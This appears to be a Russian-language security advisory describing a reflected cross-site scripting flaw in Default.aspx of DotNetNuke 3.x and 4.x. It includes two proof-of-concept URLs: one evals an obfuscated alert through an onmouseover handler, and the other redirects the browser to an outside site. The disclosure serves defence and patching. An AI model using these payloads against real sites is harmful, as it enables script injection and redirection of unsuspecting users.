Программа:
DotNetNuke 3.x
DotNetNuke 4.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием Default.aspx. Атакующий может выполнить произвольный сценарий в
браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

Alert сообщение с помощью XSS

http://[DNN URL]/Default.aspx/"onmouseover="x=’al’;x=x+’ert(/Soroush Dalili
From WWW.BugReport.IR/)’;eval(x);alert().aspx

Перенаправление с использованием XSS (Нужно использовать "?" из-за
использования ":" в "HTTP://")

http://[DNN URL]/Default.aspx/bugreport/"onmouseover="var a =’.aspx?’;document.location=’http://www.bugreport.ir/?archive’;



Оставить мнение